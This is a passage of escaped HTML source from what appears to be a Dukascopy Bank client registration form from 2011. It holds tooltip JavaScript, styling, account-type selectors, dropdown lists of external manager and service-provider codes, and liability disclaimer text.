            oThis.hideTimeoutId = window.setTimeout(oThis.hide, oThis.hideDelay);
        }

        document.write(&apos;&lt;img src=&quot;../../images/icons/16x16/tip.png&quot; align=&quot;absmiddle&quot; height=&quot;16&quot; width=&quot;16&quot; border=&quot;0&quot; id=&quot;tipImg&apos; + tipIndex + &apos;&quot;/&gt;&apos;);
        document.write(&apos;&lt;div class=&quot;tip&quot; style=&quot;display:none;&quot; id=&quot;tipContainer&apos; + tipIndex + &apos;&quot;&gt;&apos; + sTip + &apos;&lt;/div&gt;&apos;);

        this.oTipImg = document.getElementById(&apos;tipImg&apos; + tipIndex);
        this.oTipContainer = document.getElementById(&apos;tipContainer&apos; + tipIndex);
        if (typeof(width) != &apos;undefined&apos;)
            this.oTipContainer.style.width = width;
        addEventHandler(this.oTipImg, &apos;mouseover&apos;, this.show);
        addEventHandler(this.oTipContainer, &apos;mouseover&apos;, this.show);
        addEventHandler(this.oTipImg, &apos;mouseout&apos;, this.hideTimeouted);
        addEventHandler(this.oTipContainer, &apos;mouseout&apos;, this.hideTimeouted);
        tipIndex++;
    }
    &lt;/script&gt;
    &lt;!--&lt;script src=&quot;js/lib.js&quot;&gt;&lt;/script&gt;
    &lt;script src=&quot;js/checkForm.js&quot;&gt;&lt;/script&gt;--&gt;
  &lt;style&gt;
  body, td, span, div, p, tr, th, option, font, button, input, select, textarea, b, i, a {
    font-size:8pt;
    font-family:Verdana;
  }
  table  {
   table-layout:fixed;
  }
  a  {
    font-weight:bold;
    text-decoration:underline;
    color:black;
  }

  a:hover  {
    color:#666666;
  }

  .header  {
    font-size:11pt;
    height:24px;
    color:#FFFFFF;
    font-weight:bold;
    text-align:center;
    background-image: url(&apos;https://www.dukascopy.com/swiss/inc/images/headline_bg_menu.gif&apos;);
    background-color:#000;
    background-position:0px 0px;
    background-repeat:repeat-x;
  }

  .header a  {
    color:#FFFFFF;
    font-weight:bold;
    text-decoration:none;
  }

  .header a:hover  {
    color:#FFFFFF;
    text-decoration:underline;
  }

  .subheader  {
    font-size:10pt;
    color:#333333;
    font-weight:bold;
    text-align:center;
    padding:5 0 0 0;
  }

 .subheader *  {
    font-size:10pt;
    font-weight:bold;
  }

  .step  {
    font-size:10pt;
    color:#999999;
    font-weight:bold;
    text-align:center;
    padding:5 0 5 0;
  }
  .error  {
    font-size:10pt;
    color:#EE0000;
    text-align:center;
    padding:5 0 5 0;
    font-weight:bold;
  }
  .title  {
    text-align:right;
    width:50%;
    padding:2 2 2 2;
    color:#1D4470;
  }
  .field  {
    text-align:left;
    width:50%;
    padding:2 22 2 2;
  }
  .buttons  {
    text-align:center;
    padding:4 4 4 4;
  }
  .button  {
    color:white;
    border:1px outset;
    cursor:pointer;
    background-color:#1D4470;
    width:100px;
    font-weight:bold;
    height:13pt;
  }
  .info  {
    text-align:center;
    padding-left:22;
    padding-right:22;
  }
  input.text  {
    width:100%;
    border-top:1px solid #cccccc;
    border-right:1px solid #cccccc;
    border-bottom:1px solid #cccccc;
    border-left:1px solid #cccccc;
  }
  input.checkbox {

  }
  textarea  {
    width:100%;
    border:1px solid #cccccc;
    font-size:8pt !important;
    font-weight:normal !important;
  }
  select {
    border:1px solid #cccccc;
  }

  .tip {
    position:absolute;
    border: 1px solid #333333;
    background-color: #FFFFE1;
    width: 250px;
    padding: 7px;
    text-align: justify;
    z-index:100;
  }

  &lt;/style&gt;
  &lt;/head&gt;
  &lt;body onLoad=&quot;init();&quot; onBeforeUnload=&quot;showWaiting();&quot; style=&quot;margin:0px;padding:0px;&quot;&gt;
  &lt;div style=&quot;background:url(&apos;https://www.dukascopy.com/pics/topBackground.png&apos;) repeat-x;&quot;&gt;&lt;img src=&quot;https://www.dukascopy.com/pics/headers/website_logo_bank.jpg&quot; alt=&quot;Dukascopy&quot; style=&quot;width:579px;height:103px;border:none;&quot;&gt;&lt;/div&gt;
  &lt;table width=&quot;100%&quot; align=&quot;center&quot; border=&quot;0&quot; cellpadding=&quot;0&quot; cellspacing=&quot;0&quot;&gt;
&lt;form style=&quot;margin:0px;padding:0px;&quot; name=&quot;mainForm&quot; action=&quot;/fo/register/live/index.php&quot; method=&quot;post&quot;&gt;
  &lt;tr&gt;
    &lt;td colspan=&quot;2&quot; class=&quot;header&quot;&gt;
      Client Registration
    &lt;/td&gt;
  &lt;/tr&gt;
  &lt;tr&gt;
    &lt;td colspan=&quot;2&quot; class=&quot;step&quot;&gt;
      Step 1 of 6-12
    &lt;/td&gt;
  &lt;/tr&gt;
  &lt;tr&gt;
    &lt;td colspan=&quot;2&quot;&gt;
      &lt;div class=&quot;error&quot; id=topError&gt;
      	      &lt;div&gt;
    &lt;/td&gt;
  &lt;/tr&gt;
  &lt;tr&gt;
    &lt;td class=&quot;title&quot; valign=&quot;top&quot;&gt;
      Date:
    &lt;/td&gt;
    &lt;td class=&quot;field&quot; valign=&quot;top&quot;&gt;
      Thu, 17 Mar 2011    &lt;/td&gt;
  &lt;/tr&gt;
  &lt;tr&gt;
    &lt;td class=&quot;title&quot; valign=&quot;top&quot;&gt;
      Status:
    &lt;/td&gt;
    &lt;script&gt;
    	function radioClickControll() {
    		var retAcc = document.getElementById(&apos;radio_accountKind_6&apos;);
    		var stAcc  = document.getElementById(&apos;radio_accountKind_7&apos;);
    		var rInd   = document.getElementById(&apos;radio_type_1&apos;);
    		var rJoint = document.getElementById(&apos;radio_type_3&apos;);
    		var rLegal = document.getElementById(&apos;radio_type_2&apos;);

    		if(retAcc.checked) {
    			rLegal.disabled = true;
    		}
    		if(stAcc.checked) {
    			rLegal.disabled = false;
    		}

    		if(rLegal.checked) {
    			retAcc.disabled = true;
    		} 
    		if(rInd.checked || rJoint.checked) { 
    			retAcc.disabled = false;
    		}

    		
    	}
    &lt;/script&gt;
    &lt;td class=&quot;field&quot; valign=&quot;top&quot;&gt;
      &lt;input type=&quot;hidden&quot; name=&quot;aData[STRAT_REF]&quot; value=&quot;-1&quot;&gt;
      &lt;input type=&quot;hidden&quot; name=&quot;aData[FEEDBACK_URL]&quot; value=&quot;-1&quot;&gt;
      &lt;input type=&quot;radio&quot; name=&quot;aData[TYPE]&quot; id=&quot;radio_type_1&quot; value=&quot;1&quot; checked onclick=&quot;radioClickControll()&quot;&gt; &lt;label for=&quot;radio_type_1&quot;&gt;For Individuals&lt;/label&gt;&lt;br/&gt;
      &lt;input type=&quot;radio&quot; name=&quot;aData[TYPE]&quot; id=&quot;radio_type_3&quot; value=&quot;3&quot; onclick=&quot;radioClickControll()&quot;&gt; &lt;label for=&quot;radio_type_3&quot;&gt;For Joint Account&lt;/label&gt;&lt;br/&gt;
      &lt;input type=&quot;radio&quot; name=&quot;aData[TYPE]&quot; id=&quot;radio_type_2&quot; value=&quot;2&quot; onclick=&quot;radioClickControll()&quot;&gt; &lt;label for=&quot;radio_type_2&quot;&gt;For Legal Entities&lt;/label&gt;
    &lt;/td&gt;
  &lt;/tr&gt;
  &lt;tr&gt;
    &lt;td class=&quot;title&quot; valign=&quot;top&quot;&gt;
      Kind of account:
    &lt;/td&gt;
    &lt;td class=&quot;field&quot; valign=&quot;top&quot;&gt;
      &lt;script&gt;
        function fSetManagedAccountStrategyMode(bShown)  {
          oInp = document.getElementById(&apos;sel_managedAccountStrategy&apos;);
          oInp.disabled = !bShown;
          oInp.style.display = (bShown?&quot;&quot;:&quot;none&quot;);
          if(bShown) {
          	document.getElementById(&apos;servProvider0&apos;).checked = false;
          }
        }
        
        function fSetServProviderMode(bShown)  {
          oInp = document.getElementById(&apos;sel_servProvider&apos;);
          oInp.disabled = !bShown;
          oInp.style.display = (bShown?&quot;&quot;:&quot;none&quot;);
          if(bShown) {
          	document.getElementById(&apos;extManContact0&apos;).checked = false;
          } 
        }
      &lt;/script&gt;
      &lt;table border=&quot;0&quot; cellpadding=&quot;1&quot; cellspacing=&quot;0&quot; style=&quot;table-layout:auto;&quot;&gt;
        &lt;tr&gt;
          &lt;td&gt;
            &lt;input type=&quot;radio&quot; name=&quot;aData[accountKind]&quot; value=&quot;&quot; style=display:none checked&gt;
            &lt;input type=&quot;radio&quot; name=&quot;aData[accountKind]&quot; value=&quot;6&quot; id=&quot;radio_accountKind_6&quot;  onClick=&quot;radioClickControll();fSetServProviderMode(false);fSetManagedAccountStrategyMode(false);&quot;&gt;
          &lt;/td&gt;
          &lt;td&gt;
            &lt;label for=&quot;radio_accountKind_6&quot;&gt;Retail Account&lt;/label&gt;
          &lt;/td&gt;
        &lt;/tr&gt;
        
        &lt;tr&gt;
          &lt;td&gt;
            &lt;input type=&quot;radio&quot; name=&quot;aData[accountKind]&quot; value=&quot;7&quot; id=&quot;radio_accountKind_7&quot;   onClick=&quot;radioClickControll();fSetServProviderMode(false);fSetManagedAccountStrategyMode(false);&quot;&gt;
          &lt;/td&gt;
          &lt;td&gt;
            &lt;label for=&quot;radio_accountKind_7&quot;&gt;Standard Account (from 50 000 USD)&lt;/label&gt;
          &lt;/td&gt;
        &lt;/tr&gt;
        
        &lt;tr&gt;
          &lt;td&gt;
            &lt;input type=&quot;radio&quot; name=&quot;aData[accountKind]&quot; value=&quot;100&quot; id=&quot;radio_accountKind_100&quot;  onClick=&quot;fSetServProviderMode(false);fSetManagedAccountStrategyMode(true);&quot;&gt;
          &lt;/td&gt;
          &lt;td&gt;
            &lt;label for=&quot;radio_accountKind_100&quot;&gt;Managed Account&lt;/label&gt;
          &lt;/td&gt;
        &lt;/tr&gt;
        &lt;tr&gt;
        &lt;td&gt;&lt;/td&gt;
          &lt;td valign=&quot;top&quot; id=&quot;sel_managedAccountStrategy&quot; style=&quot;display:none;&quot; disabled&gt;
			          
            &lt;b&gt;Whilst selecting your Manager/Attorney and for convenience purposes only you may use the pull-down menu. Dukascopy has not performed any competence verification or due diligence, does not issue any recommendation concerning your Manager/Attorney and can not be held liable for any losses, direct and indirect damages whether financial or not, resulting from your Manager/Attorney&amp;#039;s acts or omissions.&lt;/b&gt;&lt;br&gt;
            &lt;select name=&quot;aData[managedAccountStrategy]&quot; id=&quot;sel_mas&quot;&gt;
		      &lt;option value=&apos;1ABEM3&apos; &gt;&amp;nbsp;1ABEM3&lt;/option&gt;
&lt;option value=&apos;356JFH1&apos; &gt;&amp;nbsp;356JFH1&lt;/option&gt;
&lt;option value=&apos;356JFH2&apos; &gt;&amp;nbsp;356JFH2&lt;/option&gt;
&lt;option value=&apos;356JFH3&apos; &gt;&amp;nbsp;356JFH3&lt;/option&gt;
&lt;option value=&apos;356JFH4&apos; &gt;&amp;nbsp;356JFH4&lt;/option&gt;
&lt;option value=&apos;356JFH5&apos; &gt;&amp;nbsp;356JFH5&lt;/option&gt;
&lt;option value=&apos;3SFX1&apos; &gt;&amp;nbsp;3SFX1&lt;/option&gt;
&lt;option value=&apos;3SFX2&apos; &gt;&amp;nbsp;3SFX2&lt;/option&gt;
&lt;option value=&apos;45GHKLBV&apos; &gt;&amp;nbsp;45GHKLBV&lt;/option&gt;
&lt;option value=&apos;AADB88&apos; &gt;&amp;nbsp;AADB88&lt;/option&gt;
&lt;option value=&apos;ABBB22&apos; &gt;&amp;nbsp;ABBB22&lt;/option&gt;
&lt;option value=&apos;ABEF73&apos; &gt;&amp;nbsp;ABEF73&lt;/option&gt;
&lt;option value=&apos;AEAC86&apos; &gt;&amp;nbsp;AEAC86&lt;/option&gt;
&lt;option value=&apos;AECC31&apos; &gt;&amp;nbsp;AECC31&lt;/option&gt;
&lt;option value=&apos;ALPX&apos; &gt;&amp;nbsp;ALPX&lt;/option&gt;
&lt;option value=&apos;ALTV&apos; &gt;&amp;nbsp;ALTV&lt;/option&gt;
&lt;option value=&apos;ARCH&apos; &gt;&amp;nbsp;ARCH&lt;/option&gt;
&lt;option value=&apos;ARXX&apos; &gt;&amp;nbsp;ARXX&lt;/option&gt;
&lt;option value=&apos;AZAT681&apos; &gt;&amp;nbsp;AZAT681&lt;/option&gt;
&lt;option value=&apos;Augustan&apos; &gt;&amp;nbsp;Augustan&lt;/option&gt;
&lt;option value=&apos;BABC92&apos; &gt;&amp;nbsp;BABC92&lt;/option&gt;
&lt;option value=&apos;BADF84&apos; &gt;&amp;nbsp;BADF84&lt;/option&gt;
&lt;option value=&apos;BAYWM&apos; &gt;&amp;nbsp;BAYWM&lt;/option&gt;
&lt;option value=&apos;BCAD67&apos; &gt;&amp;nbsp;BCAD67&lt;/option&gt;
&lt;option value=&apos;BCBC72&apos; &gt;&amp;nbsp;BCBC72&lt;/option&gt;
&lt;option value=&apos;BCCA82&apos; &gt;&amp;nbsp;BCCA82&lt;/option&gt;
&lt;option value=&apos;BCEE55&apos; &gt;&amp;nbsp;BCEE55&lt;/option&gt;
&lt;option value=&apos;BDAD35&apos; &gt;&amp;nbsp;BDAD35&lt;/option&gt;
&lt;option value=&apos;BDCC70&apos; &gt;&amp;nbsp;BDCC70&lt;/option&gt;
&lt;option value=&apos;BDCP&apos; &gt;&amp;nbsp;BDCP&lt;/option&gt;
&lt;option value=&apos;BEAD70&apos; &gt;&amp;nbsp;BEAD70&lt;/option&gt;
&lt;option value=&apos;BEAF55&apos; &gt;&amp;nbsp;BEAF55&lt;/option&gt;
&lt;option value=&apos;BECF19&apos; &gt;&amp;nbsp;BECF19&lt;/option&gt;
&lt;option value=&apos;BEDD59&apos; &gt;&amp;nbsp;BEDD59&lt;/option&gt;
&lt;option value=&apos;BEEE43&apos; &gt;&amp;nbsp;BEEE43&lt;/option&gt;
&lt;option value=&apos;BRKIC&apos; &gt;&amp;nbsp;BRKIC&lt;/option&gt;
&lt;option value=&apos;BUSH&apos; &gt;&amp;nbsp;BUSH&lt;/option&gt;
&lt;option value=&apos;BUSH288&apos; &gt;&amp;nbsp;BUSH288&lt;/option&gt;
&lt;option value=&apos;CBFB47&apos; &gt;&amp;nbsp;CBFB47&lt;/option&gt;
&lt;option value=&apos;CCDE32&apos; &gt;&amp;nbsp;CCDE32&lt;/option&gt;
&lt;option value=&apos;CCPFX&apos; &gt;&amp;nbsp;CCPFX&lt;/option&gt;
&lt;option value=&apos;CDCD88&apos; &gt;&amp;nbsp;CDCD88&lt;/option&gt;
&lt;option value=&apos;CDFD34&apos; &gt;&amp;nbsp;CDFD34&lt;/option&gt;
&lt;option value=&apos;CEDD62&apos; &gt;&amp;nbsp;CEDD62&lt;/option&gt;
&lt;option value=&apos;CEFA67&apos; &gt;&amp;nbsp;CEFA67&lt;/option&gt;
&lt;option value=&apos;CEFF58&apos; &gt;&amp;nbsp;CEFF58&lt;/option&gt;
&lt;option value=&apos;CFEC46&apos; &gt;&amp;nbsp;CFEC46&lt;/option&gt;
&lt;option value=&apos;CFFX&apos; &gt;&amp;nbsp;CFFX&lt;/option&gt;
&lt;option value=&apos;CGFX&apos; &gt;&amp;nbsp;CGFX&lt;/option&gt;
&lt;option value=&apos;CHBC&apos; &gt;&amp;nbsp;CHBC&lt;/option&gt;
&lt;option value=&apos;CLMFX&apos; &gt;&amp;nbsp;CLMFX&lt;/option&gt;
&lt;option value=&apos;CurrClub&apos; &gt;&amp;nbsp;CurrClub&lt;/option&gt;
&lt;option value=&apos;DADD65&apos; &gt;&amp;nbsp;DADD65&lt;/option&gt;
&lt;option value=&apos;DBAA26&apos; &gt;&amp;nbsp;DBAA26&lt;/option&gt;
&lt;option value=&apos;DBAF77&apos; &gt;&amp;nbsp;DBAF77&lt;/option&gt;
&lt;option value=&apos;DBFB93&apos; &gt;&amp;nbsp;DBFB93&lt;/option&gt;
&lt;option value=&apos;DCCD84&apos; &gt;&amp;nbsp;DCCD84&lt;/option&gt;
&lt;option value=&apos;DCEC93&apos; &gt;&amp;nbsp;DCEC93&lt;/option&gt;
&lt;option value=&apos;DDBF26&apos; &gt;&amp;nbsp;DDBF26&lt;/option&gt;
&lt;option value=&apos;DDCC49&apos; &gt;&amp;nbsp;DDCC49&lt;/option&gt;
&lt;option value=&apos;DDDB32&apos; &gt;&amp;nbsp;DDDB32&lt;/option&gt;
&lt;option value=&apos;DEFD33&apos; &gt;&amp;nbsp;DEFD33&lt;/option&gt;
&lt;option value=&apos;DF56NB&apos; &gt;&amp;nbsp;DF56NB&lt;/option&gt;
&lt;option value=&apos;DF794J0&apos; &gt;&amp;nbsp;DF794J0&lt;/option&gt;
&lt;option value=&apos;DFAF50&apos; &gt;&amp;nbsp;DFAF50&lt;/option&gt;
&lt;option value=&apos;DG785&apos; &gt;&amp;nbsp;DG785&lt;/option&gt;
&lt;option value=&apos;DOXX&apos; &gt;&amp;nbsp;DOXX&lt;/option&gt;
&lt;option value=&apos;DRFX1&apos; &gt;&amp;nbsp;DRFX1&lt;/option&gt;
&lt;option value=&apos;DSBP&apos; &gt;&amp;nbsp;DSBP&lt;/option&gt;
&lt;option value=&apos;EACE93&apos; &gt;&amp;nbsp;EACE93&lt;/option&gt;
&lt;option value=&apos;EADA74&apos; &gt;&amp;nbsp;EADA74&lt;/option&gt;
&lt;option value=&apos;EAEE21&apos; &gt;&amp;nbsp;EAEE21&lt;/option&gt;
&lt;option value=&apos;EAFD36&apos; &gt;&amp;nbsp;EAFD36&lt;/option&gt;
&lt;option value=&apos;EBAD44&apos; &gt;&amp;nbsp;EBAD44&lt;/option&gt;
&lt;option value=&apos;EBBB34&apos; &gt;&amp;nbsp;EBBB34&lt;/option&gt;
&lt;option value=&apos;EBDE90&apos; &gt;&amp;nbsp;EBDE90&lt;/option&gt;
&lt;option value=&apos;ECURRENTZ&apos; &gt;&amp;nbsp;ECURRENTZ&lt;/option&gt;
&lt;option value=&apos;EDCC46&apos; &gt;&amp;nbsp;EDCC46&lt;/option&gt;
&lt;option value=&apos;EFAF70&apos; &gt;&amp;nbsp;EFAF70&lt;/option&gt;
&lt;option value=&apos;EFBB17&apos; &gt;&amp;nbsp;EFBB17&lt;/option&gt;
&lt;option value=&apos;EFCA50&apos; &gt;&amp;nbsp;EFCA50&lt;/option&gt;
&lt;option value=&apos;EFCA92&apos; &gt;&amp;nbsp;EFCA92&lt;/option&gt;
&lt;option value=&apos;FAAC62&apos; &gt;&amp;nbsp;FAAC62&lt;/option&gt;
&lt;option value=&apos;FBDB80&apos; &gt;&amp;nbsp;FBDB80&lt;/option&gt;
&lt;option value=&apos;FBDF30&apos; &gt;&amp;nbsp;FBDF30&lt;/option&gt;
&lt;option value=&apos;FBED79&apos; &gt;&amp;nbsp;FBED79&lt;/option&gt;
&lt;option value=&apos;FBFA65&apos; &gt;&amp;nbsp;FBFA65&lt;/option&gt;
&lt;option value=&apos;FCCA80&apos; &gt;&amp;nbsp;FCCA80&lt;/option&gt;
&lt;option value=&apos;FDAG&apos; &gt;&amp;nbsp;FDAG&lt;/option&gt;
&lt;option value=&apos;FEEC47&apos; &gt;&amp;nbsp;FEEC47&lt;/option&gt;
&lt;option value=&apos;FFFF98&apos; &gt;&amp;nbsp;FFFF98&lt;/option&gt;
&lt;option value=&apos;FGB1WFM&apos; &gt;&amp;nbsp;FGB1WFM&lt;/option&gt;
&lt;option value=&apos;FGH7GB&apos; &gt;&amp;nbsp;FGH7GB&lt;/option&gt;
&lt;option value=&apos;FGH90IK&apos; &gt;&amp;nbsp;FGH90IK&lt;/option&gt;
&lt;option value=&apos;FIBX1&apos; &gt;&amp;nbsp;FIBX1&lt;/option&gt;
&lt;option value=&apos;FORMA&apos; &gt;&amp;nbsp;FORMA&lt;/option&gt;
&lt;option value=&apos;FORT&apos; &gt;&amp;nbsp;FORT&lt;/option&gt;
&lt;option value=&apos;FRAPX&apos; &gt;&amp;nbsp;FRAPX&lt;/option&gt;
&lt;option value=&apos;FTAM&apos; &gt;&amp;nbsp;FTAM&lt;/option&gt;
&lt;option value=&apos;FXDASH1A&apos; &gt;&amp;nbsp;FXDASH1A&lt;/option&gt;
&lt;option value=&apos;FXG1&apos; &gt;&amp;nbsp;FXG1&lt;/option&gt;
&lt;option value=&apos;FXMN&apos; &gt;&amp;nbsp;FXMN&lt;/option&gt;
&lt;option value=&apos;FXPOR&apos; &gt;&amp;nbsp;FXPOR&lt;/option&gt;
&lt;option value=&apos;FXRGC&apos; &gt;&amp;nbsp;FXRGC&lt;/option&gt;
&lt;option value=&apos;G7NV&apos; &gt;&amp;nbsp;G7NV&lt;/option&gt;
&lt;option value=&apos;GHJKL76&apos; &gt;&amp;nbsp;GHJKL76&lt;/option&gt;
&lt;option value=&apos;GLCM&apos; &gt;&amp;nbsp;GLCM&lt;/option&gt;
&lt;option value=&apos;GSYE&apos; &gt;&amp;nbsp;GSYE&lt;/option&gt;
&lt;option value=&apos;GTG67H&apos; &gt;&amp;nbsp;GTG67H&lt;/option&gt;
&lt;option value=&apos;GTXX&apos; &gt;&amp;nbsp;GTXX&lt;/option&gt;
&lt;option value=&apos;HJH768&apos; &gt;&amp;nbsp;HJH768&lt;/option&gt;
&lt;option value=&apos;HKJBXF&apos; &gt;&amp;nbsp;HKJBXF&lt;/option&gt;
&lt;option value=&apos;HRAPX&apos; &gt;&amp;nbsp;HRAPX&lt;/option&gt;
&lt;option value=&apos;HUSK&apos; &gt;&amp;nbsp;HUSK&lt;/option&gt;
&lt;option value=&apos;IDTX&apos; &gt;&amp;nbsp;IDTX&lt;/option&gt;
&lt;option value=&apos;IDTX1&apos; &gt;&amp;nbsp;IDTX1&lt;/option&gt;
&lt;option value=&apos;IDTX2&apos; &gt;&amp;nbsp;IDTX2&lt;/option&gt;
&lt;option value=&apos;IDTX3&apos; &gt;&amp;nbsp;IDTX3&lt;/option&gt;
&lt;option value=&apos;INHH&apos; &gt;&amp;nbsp;INHH&lt;/option&gt;
&lt;option value=&apos;ITASCA&apos; &gt;&amp;nbsp;ITASCA&lt;/option&gt;
&lt;option value=&apos;JDCFX&apos; &gt;&amp;nbsp;JDCFX&lt;/option&gt;
&lt;option value=&apos;JLS&apos; &gt;&amp;nbsp;JLS&lt;/option&gt;
&lt;option value=&apos;JSDM&apos; &gt;&amp;nbsp;JSDM&lt;/option&gt;
&lt;option value=&apos;KRCM1&apos; &gt;&amp;nbsp;KRCM1&lt;/option&gt;
&lt;option value=&apos;KRCM2&apos; &gt;&amp;nbsp;KRCM2&lt;/option&gt;
&lt;option value=&apos;LBMFX&apos; &gt;&amp;nbsp;LBMFX&lt;/option&gt;
&lt;option value=&apos;LBXX2&apos; &gt;&amp;nbsp;LBXX2&lt;/option&gt;
&lt;option value=&apos;LMXX&apos; &gt;&amp;nbsp;LMXX&lt;/option&gt;
&lt;option value=&apos;LivIn&apos; &gt;&amp;nbsp;LivIn&lt;/option&gt;
&lt;option value=&apos;MASI&apos; &gt;&amp;nbsp;MASI&lt;/option&gt;
&lt;option value=&apos;MBCM&apos; &gt;&amp;nbsp;MBCM&lt;/option&gt;
&lt;option value=&apos;MBCO&apos; &gt;&amp;nbsp;MBCO&lt;/option&gt;
&lt;option value=&apos;MDLV&apos; &gt;&amp;nbsp;MDLV&lt;/option&gt;
&lt;option value=&apos;MEIDAO&apos; &gt;&amp;nbsp;MEIDAO&lt;/option&gt;
&lt;option value=&apos;NK71&apos; &gt;&amp;nbsp;NK71&lt;/option&gt;
&lt;option value=&apos;NKHFX&apos; &gt;&amp;nbsp;NKHFX&lt;/option&gt;
&lt;option value=&apos;OANFx5&apos; &gt;&amp;nbsp;OANFx5&lt;/option&gt;
&lt;option value=&apos;OANFx55&apos; &gt;&amp;nbsp;OANFx55&lt;/option&gt;
&lt;option value=&apos;OGFX&apos; &gt;&amp;nbsp;OGFX&lt;/option&gt;
&lt;option value=&apos;PAXX&apos; &gt;&amp;nbsp;PAXX&lt;/option&gt;
&lt;option value=&apos;PORFX&apos; &gt;&amp;nbsp;PORFX&lt;/option&gt;
&lt;option value=&apos;PRSP&apos; &gt;&amp;nbsp;PRSP&lt;/option&gt;
&lt;option value=&apos;PURK1&apos; &gt;&amp;nbsp;PURK1&lt;/option&gt;
&lt;option value=&apos;RGCSR&apos; &gt;&amp;nbsp;RGCSR&lt;/option&gt;
&lt;option value=&apos;RJPFX&apos; &gt;&amp;nbsp;RJPFX&lt;/option&gt;
&lt;option value=&apos;RMJ&apos; &gt;&amp;nbsp;RMJ&lt;/option&gt;
&lt;option value=&apos;RNKFX&apos; &gt;&amp;nbsp;RNKFX&lt;/option&gt;
&lt;option value=&apos;ROXX&apos; &gt;&amp;nbsp;ROXX&lt;/option&gt;
&lt;option value=&apos;RSFX&apos; &gt;&amp;nbsp;RSFX&lt;/option&gt;
&lt;option value=&apos;RUSLION&apos; &gt;&amp;nbsp;RUSLION&lt;/option&gt;
&lt;option value=&apos;Rio2016&apos; &gt;&amp;nbsp;Rio2016&lt;/option&gt;
&lt;option value=&apos;SARK&apos; &gt;&amp;nbsp;SARK&lt;/option&gt;
&lt;option value=&apos;SEP1&apos; &gt;&amp;nbsp;SEP1&lt;/option&gt;
&lt;option value=&apos;SKUSN&apos; &gt;&amp;nbsp;SKUSN&lt;/option&gt;
&lt;option value=&apos;SMXX&apos; &gt;&amp;nbsp;SMXX&lt;/option&gt;
&lt;option value=&apos;SOUK&apos; &gt;&amp;nbsp;SOUK&lt;/option&gt;
&lt;option value=&apos;SRVFX&apos; &gt;&amp;nbsp;SRVFX&lt;/option&gt;
&lt;option value=&apos;STAC&apos; &gt;&amp;nbsp;STAC&lt;/option&gt;
&lt;option value=&apos;STAR+&apos; &gt;&amp;nbsp;STAR+&lt;/option&gt;
&lt;option value=&apos;SVTL&apos; &gt;&amp;nbsp;SVTL&lt;/option&gt;
&lt;option value=&apos;TC4ET&apos; &gt;&amp;nbsp;TC4ET&lt;/option&gt;
&lt;option value=&apos;TFGINC&apos; &gt;&amp;nbsp;TFGINC&lt;/option&gt;
&lt;option value=&apos;VASCON1&apos; &gt;&amp;nbsp;VASCON1&lt;/option&gt;
&lt;option value=&apos;VASCON2&apos; &gt;&amp;nbsp;VASCON2&lt;/option&gt;
&lt;option value=&apos;VASCON3&apos; &gt;&amp;nbsp;VASCON3&lt;/option&gt;
&lt;option value=&apos;VFGL5112&apos; &gt;&amp;nbsp;VFGL5112&lt;/option&gt;
&lt;option value=&apos;VHGLNM678&apos; &gt;&amp;nbsp;VHGLNM678&lt;/option&gt;
&lt;option value=&apos;VKCS52&apos; &gt;&amp;nbsp;VKCS52&lt;/option&gt;
&lt;option value=&apos;VNG409CG&apos; &gt;&amp;nbsp;VNG409CG&lt;/option&gt;
&lt;option value=&apos;Vulov10&apos; &gt;&amp;nbsp;Vulov10&lt;/option&gt;
&lt;option value=&apos;W2WFX&apos; &gt;&amp;nbsp;W2WFX&lt;/option&gt;
&lt;option value=&apos;WDFX&apos; &gt;&amp;nbsp;WDFX&lt;/option&gt;
&lt;option value=&apos;WDFX2&apos; &gt;&amp;nbsp;WDFX2&lt;/option&gt;
&lt;option value=&apos;WDXX&apos; &gt;&amp;nbsp;WDXX&lt;/option&gt;
&lt;option value=&apos;XYWFX&apos; &gt;&amp;nbsp;XYWFX&lt;/option&gt;
  
            &lt;/select&gt;&lt;br&gt;
			&lt;p&gt;&lt;input type=&quot;checkbox&quot; name=&quot;aData[extManAnswer]&quot; value=&quot;Yes&quot; id=extManContact0&gt;&lt;label for=extManContact0&gt; - &lt;b&gt;I expressly confirm that the selection/appointment of the External Manager is my own initiative without any recommendation from Dukascopy Bank SA. I have proceeded to a due diligence on the External Manager and will keep Dukascopy Bank SA harmless and fully indemnified against any and all losses, direct and indirect damages whether financial or not, resulting from my External Manager&amp;#039;s acts or omissions.&lt;/b&gt;&lt;/label&gt;
			&lt;/p&gt;&lt;br&gt;
          &lt;/td&gt;
        &lt;/tr&gt;

        &lt;tr&gt;
          &lt;td&gt;
            &lt;input type=&quot;radio&quot; name=&quot;aData[accountKind]&quot; value=&quot;200&quot; id=&quot;radio_accountKind_200&quot; checked onClick=&quot;fSetServProviderMode(true);fSetManagedAccountStrategyMode(false);&quot;&gt;
          &lt;/td&gt;
          &lt;td&gt;
            &lt;label for=&quot;radio_accountKind_200&quot;&gt;Service Provider&lt;/label&gt;
          &lt;/td&gt;
        &lt;/tr&gt;
        &lt;tr&gt;
        &lt;td&gt;&lt;/td&gt;
          &lt;td valign=&quot;top&quot; id=&quot;sel_servProvider&quot; &gt;
			          
            &lt;b&gt;Whilst selecting your Service Provider and for convenience purposes only you may use the pull-down menu. Dukascopy has not performed any competence verification or due diligence, does not issue any recommendation concerning your Service Provider and can not be held liable for any losses, direct and indirect damages whether financial or not, resulting from your Service Provider&amp;#039;s acts or omissions.&lt;/b&gt;&lt;br&gt;
            &lt;select name=&quot;aData[serviceProvider]&quot; id=&quot;sel_mas2&quot;&gt;
		      &lt;option value=&apos;BBAC47&apos; &gt;&amp;nbsp;BBAC47&lt;/option&gt;
&lt;option value=&apos;BUSH1&apos; &gt;&amp;nbsp;BUSH1&lt;/option&gt;
&lt;option value=&apos;BUSH2&apos; &gt;&amp;nbsp;BUSH2&lt;/option&gt;
&lt;option value=&apos;GNM87FV&apos; &gt;&amp;nbsp;GNM87FV&lt;/option&gt;
&lt;option value=&apos;KRC1&apos; &gt;&amp;nbsp;KRC1&lt;/option&gt;
&lt;option value=&apos;KRC2&apos; &gt;&amp;nbsp;KRC2&lt;/option&gt;
&lt;option value=&apos;KRC3&apos; &gt;&amp;nbsp;KRC3&lt;/option&gt;
&lt;option value=&apos;TINL&apos; &gt;&amp;nbsp;TINL&lt;/option&gt;
&lt;option value=&apos;ZUXX&apos; &gt;&amp;nbsp;ZUXX&lt;/option&gt;
  
            &lt;/select&gt;&lt;br&gt;
